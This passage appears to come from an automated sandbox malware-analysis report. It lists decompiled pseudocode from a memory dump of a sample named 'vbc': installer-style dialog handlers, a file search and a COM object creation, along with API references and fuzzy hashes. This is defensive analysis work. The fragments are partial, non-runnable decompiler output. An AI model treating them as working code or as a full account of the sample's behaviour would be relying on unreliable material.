						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}

0x004021b3
0x004021bd
0x004021c7
0x004021d1
0x004021dc
0x004021df
0x004021f9
0x004021fc
0x00402202
0x00402205
0x0040220f
0x00402213
0x00402213
0x00402218
0x00402229
0x00402231
0x004022e8
0x004022e8
0x004022ef
0x00402237
0x00402237
0x00402246
0x0040224a
0x0040224d
0x00402253
0x00402261
0x00402264
0x00402266
0x00402271
0x00402271
0x00402276
0x00402278
0x0040227f
0x0040227f
0x00402282
0x0040228b
0x0040228e
0x00402294
0x00402296
0x004022a0
0x004022a0
0x004022a3
0x004022ac
0x004022af
0x004022b8
0x004022be
0x004022c0
0x004022ce
0x004022ce
0x004022d1
0x004022d7
0x004022d7
0x004022da
0x004022e0
0x004022e6
0x004022fb
0x00000000
0x00000000
0x00000000
0x004022e6
0x004022f1
0x00402c2d
0x00402c39

APIs

CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?), ref: 00402229

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: b0b822540a1f8e9f15e50715e8c4ec56282f12879c6d9eab3f74b311f962a689
Instruction ID: 703d758d197f09623ff28e3c758b152e072eb06d6e5445e6f92684eec68365f7
Opcode Fuzzy Hash: b0b822540a1f8e9f15e50715e8c4ec56282f12879c6d9eab3f74b311f962a689
Instruction Fuzzy Hash: 47412571A00209EFCF40DFE4C989E9D7BB5BF49344B2045AAF505EB2D1DB799981CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E00406461( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E0040651A();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}

0x00402923
0x0040293e
0x00402949
0x0040294a
0x00402a94
0x00402925
0x00402928
0x0040292b
0x0040292e
0x0040292e
0x00402c2d
0x00402c39

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 1e85ad8e298d533372e236d13d1dc995d53f22f379fc750621e13dcefc93ed24
Instruction ID: 12288428410ef0014967daf25a5ca188ca533e908051b72e28feae2455f0dfde
Opcode Fuzzy Hash: 1e85ad8e298d533372e236d13d1dc995d53f22f379fc750621e13dcefc93ed24
Instruction Fuzzy Hash: A6F05E71904114EED701DBA4D949AAEB378EF55318F20857BE101F21D0EBB88E119B2A

Uniqueness

Uniqueness Score: -1.00%

Function 00404EE3 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00404EE3(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x7a8a88;
				_v28 =  *0x7a8a70 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x7a8a79 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404E31(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x7a8a78) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x7a1f2c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x7a1f40;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x7a1f2c = 0;
								 *0x7a1f40 = 0;
								 *0x7a8ac0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x7a8a79 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404EB1();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x7a1f40;
									_t201 =  *0x7a8a88;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x7a8a8c <= 0) {
										L86:
										if( *0x7a8b1e == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x7a7a3c + 0x10)) != 0) {
											E00404DEC(0x3ff, 0xfffffffb, E00404E04(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x7a8a8c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x7a1f40);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x7a8ac0 = _t291;
					 *0x7a1f40 = GlobalAlloc(0x40,  *0x7a8a8c << 2);
					_t258 = LoadImageW( *0x7a8a60, 0x6e, 0, 0, 0, 0);
					 *0x7a1f34 =  *0x7a1f34 | 0xffffffff;
					_t297 = _t258;
					 *0x7a1f3c = SetWindowLongW(_v8, 0xfffffffc, E004054F0);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x7a1f2c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x7a1f2c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E00406557(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E00404476(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E00404476(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x7a8a8c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x7a1f40 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x7a1f40 + _t300 * 4) = _t284;
									_v16 =  *( *0x7a1f40 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x7a8a8c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004044AB(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004044AB(_v12);
								L93:
								return E004044DD(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404eea
0x00404f03
0x00404f08
0x00404f10
0x00404f16
0x00404f2c
0x00404f2f
0x0040515a
0x00405161
0x00405175
0x00405163
0x00405165
0x00405168
0x00405169
0x00405170
0x00405170
0x00405181
0x0040518f
0x00405192
0x004051a8
0x0040521d
0x00405220
0x00405222
0x0040522c
0x0040523a
0x0040523a
0x0040523c
0x00405246
0x0040524c
0x0040524f
0x00405252
0x0040526d
0x00405254
0x0040525e
0x0040525e
0x00405252
0x00405246
0x00000000
0x00405220
0x004051ad
0x004051b8
0x004051bd
0x004051c4
0x004051c9
0x004051cd
0x004051d8
0x004051d8
0x004051dc
0x004051e0
0x004051e4
0x004051f7
0x004051e6
0x004051e6
0x004051ed
0x004051f3
0x004051ef
0x004051ef
0x004051ef
0x004051ed
0x004051fb
0x004051fd
0x00405210
0x00405213
0x00405216
0x00405216
0x004051e0
0x00000000
0x004051cd
0x004051af
0x004051b6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405270
0x00405270
0x00405277
0x004052e8
0x004052f0
0x004052f8
0x004052f8
0x00405301
0x00405303
0x0040530a
0x0040530d
0x0040530d
0x00405313
0x0040531a
0x0040531d
0x0040531d
0x00405323
0x00405329
0x0040532f
0x0040532f
0x0040533c
0x0040549d
0x004054a4
0x004054c1
0x004054c7
0x004054d9
0x004054d9
0x00000000
0x00405342
0x00405344
0x00405349
0x0040534e
0x00405353
0x00405355
0x00405355
0x00405356
0x00405357
0x00405359
0x00405359
0x00405361
0x004053a2
0x004053a4
0x004053b4
0x004053b7
0x004053bc
0x004053c3
0x004053c6
0x00405468
0x00405471
0x00405479
0x00405479
0x00405487
0x00405498
0x00405498
0x00000000
0x00405487
0x004053cc
0x004053cf
0x004053d5
0x004053da
0x004053dc
0x004053de
0x004053e4
0x004053eb
0x004053f0
0x004053f7
0x004053fa
0x004053fa
0x00405401
0x0040540d
0x00405411
0x00405413
0x00405413
0x00405403
0x00405405
0x00405405
0x00405433
0x0040543f
0x0040544e
0x0040544e
0x00405450
0x00405453
0x0040545c
0x00000000
0x00405363
0x0040536e
0x00405371
0x00405376
0x00405378
0x0040537c
0x0040538c
0x00405396
0x00405398
0x0040539b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040537e
0x0040537e
0x00405384
0x00405386
0x00405386
0x00405387
0x00405388
0x00000000
0x0040537e
0x00405361
0x0040533c
0x0040527f
0x00000000
0x00405295
0x0040529f
0x004052a4
0x00000000
0x00000000
0x004052b6
0x004052bb
0x004052c7
0x004052c7
0x004052c9
0x004052d8
0x004052da
0x004052de
0x004052e1
0x00000000
0x004052e1
0x0040527f
0x00404f35
0x00404f3a
0x00404f43
0x00404f4a
0x00404f5c
0x00404f67
0x00404f6d
0x00404f7b
0x00404f8f
0x00404f94
0x00404fa1
0x00404fa6
0x00404fbc
0x00404fcd
0x00404fda
0x00404fda
0x00404fdd
0x00404fe3
0x00404fe5
0x00404fe8
0x00404fed
0x00404ff2
0x00404ff4
0x00404ff4
0x00405014
0x00405014
0x00405016
0x00405017
0x0040501c
0x00405022
0x00405026
0x0040502b
0x00405033
0x00405037
0x0040503c
0x00405041
0x00405049
0x0040504c
0x0040511c
0x0040512f
0x00000000
0x00405052
0x00405055
0x00405058
0x0040505b
0x0040505b
0x00405061
0x0040506a
0x0040506d
0x00405071
0x00405074
0x00405077
0x00405080
0x00405089
0x0040508c
0x0040508f
0x00405092
0x004050d0
0x004050fb
0x004050d2
0x004050e1
0x004050e1
0x00405094
0x00405097
0x004050a5
0x004050af
0x004050b7
0x004050be
0x004050c9
0x004050c9
0x00405092
0x00405101
0x00405102
0x0040510e
0x0040510e
0x0040511a
0x00405135
0x00405138
0x00405155
0x00000000
0x0040513a
0x0040513f
0x00405148
0x004054db
0x004054ed
0x004054ed
0x00405138
0x00000000
0x0040511a
0x0040504c

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404EFB
GetDlgItem.USER32(?,00000408), ref: 00404F06
GlobalAlloc.KERNEL32(00000040,?), ref: 00404F50
LoadImageW.USER32 ref: 00404F67
SetWindowLongW.USER32 ref: 00404F80
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404F94
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FA6
SendMessageW.USER32(?,00001109,00000002), ref: 00404FBC
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FC8
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FDA
DeleteObject.GDI32(00000000), ref: 00404FDD
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405008
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405014
SendMessageW.USER32(?,00001132,00000000,?), ref: 004050AF
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 004050DF

Part of subcall function 004044AB: SendMessageW.USER32(00000028,?,00000001,004042D6), ref: 004044B9

SendMessageW.USER32(?,00001132,00000000,?), ref: 004050F3
GetWindowLongW.USER32(?,000000F0), ref: 00405121
SetWindowLongW.USER32 ref: 0040512F
ShowWindow.USER32(?,00000005), ref: 0040513F
SendMessageW.USER32(?,00000419,00000000,?), ref: 0040523A
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040529F
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052B4
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052D8
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004052F8
ImageList_Destroy.COMCTL32(?), ref: 0040530D
GlobalFree.KERNEL32(?), ref: 0040531D
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405396
SendMessageW.USER32(?,00001102,?,?), ref: 0040543F
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040544E
InvalidateRect.USER32(?,00000000,00000001), ref: 00405479
ShowWindow.USER32(?,00000000), ref: 004054C7
GetDlgItem.USER32(?,000003FE), ref: 004054D2
ShowWindow.USER32(00000000), ref: 004054D9

Strings

N, xrefs: 00405178
, xrefs: 004054B1
M, xrefs: 00405097

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: d16f015aa7e03b3a4c7b4e3c21f51a65bb20fb0afa08736e4432fb14da1321df
Instruction ID: cd3a3d13ac431be8b4ce3887d4b4ed089ddf64e85d32bcda767c16d05f8e906a
Opcode Fuzzy Hash: d16f015aa7e03b3a4c7b4e3c21f51a65bb20fb0afa08736e4432fb14da1321df
Instruction Fuzzy Hash: 8D028B70900609AFDB20DFA5CC45EAF7BB5FB85314F10817AE610BA2E1DB798941DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00404635 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00404635(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				intOrPtr _t69;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t108;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L13:
						__eflags = _a8 - 0x4e;
						if(_a8 != 0x4e) {
							__eflags = _a8 - 0x40b;
							if(_a8 == 0x40b) {
								 *0x79ff14 =  *0x79ff14 + 1;
								__eflags =  *0x79ff14;
							}
							L27:
							_t114 = _a16;
							L28:
							return E004044DD(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						__eflags =  *((intOrPtr*)(_t114 + 8)) - 0x70b;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b) {
							__eflags =  *((intOrPtr*)(_t114 + 0xc)) - 0x201;
							if( *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
								_t103 =  *((intOrPtr*)(_t114 + 0x1c));
								_t113 =  *((intOrPtr*)(_t114 + 0x18));
								_v12 = _t103;
								__eflags = _t103 - _t113 - 0x800;
								_v16 = _t113;
								_v8 = 0x7a6a00;
								if(_t103 - _t113 < 0x800) {
									SendMessageW(_t56, 0x44b, 0,  &_v16);
									SetCursor(LoadCursorW(0, 0x7f02));
									_push(1);
									E004048E4(_a4, _v8);
									SetCursor(LoadCursorW(0, 0x7f00));
									_t114 = _a16;
								}
							}
						}
						__eflags =  *((intOrPtr*)(_t114 + 8)) - 0x700;
						if( *((intOrPtr*)(_t114 + 8)) != 0x700) {
							goto L28;
						} else {
							__eflags =  *((intOrPtr*)(_t114 + 0xc)) - 0x100;
							if( *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
								goto L28;
							}
							__eflags =  *((intOrPtr*)(_t114 + 0x10)) - 0xd;
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x7a8a68, 0x111, 1, 0);
							}
							__eflags =  *((intOrPtr*)(_t114 + 0x10)) - 0x1b;
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x7a8a68, 0x10, 0, 0);
							}
							return 1;
						}
					}
					__eflags = _a12 >> 0x10;
					if(_a12 >> 0x10 != 0) {
						goto L27;
					}
					__eflags =  *0x79ff14; // 0x0
					if(__eflags != 0) {
						goto L27;
					}
					_t69 =  *0x7a0f20; // 0x9f0f84
					_t29 = _t69 + 0x14; // 0x9f0f98
					_t116 = _t29;
					__eflags =  *_t116 & 0x00000020;
					if(( *_t116 & 0x00000020) == 0) {
						goto L27;
					}
					_t108 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
					__eflags = _t108;
					 *_t116 = _t108;
					E00404498(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
					E004048C0();
					goto L13;
				} else {
					_t117 = _a16;
					_t75 =  *(_t117 + 0x30);
					if(_t75 < 0) {
						_t75 =  *( *0x7a7a3c - 4 + _t75 * 4);
					}
					_t76 =  *0x7a8a98 + _t75 * 2;
					_t110 =  *_t76 & 0x0000ffff;
					_a8 = _t110;
					_t78 =  &(_t76[1]);
					_a16 = _t78;
					_v16 = _t78;
					_v12 = 0;
					_v8 = E004045E6;
					if(_t110 != 2) {
						_v8 = E004045AC;
					}
					_push( *((intOrPtr*)(_t117 + 0x34)));
					_push(0x22);
					E00404476(_a4);
					_push( *((intOrPtr*)(_t117 + 0x38)));
					_push(0x23);
					E00404476(_a4);
					CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
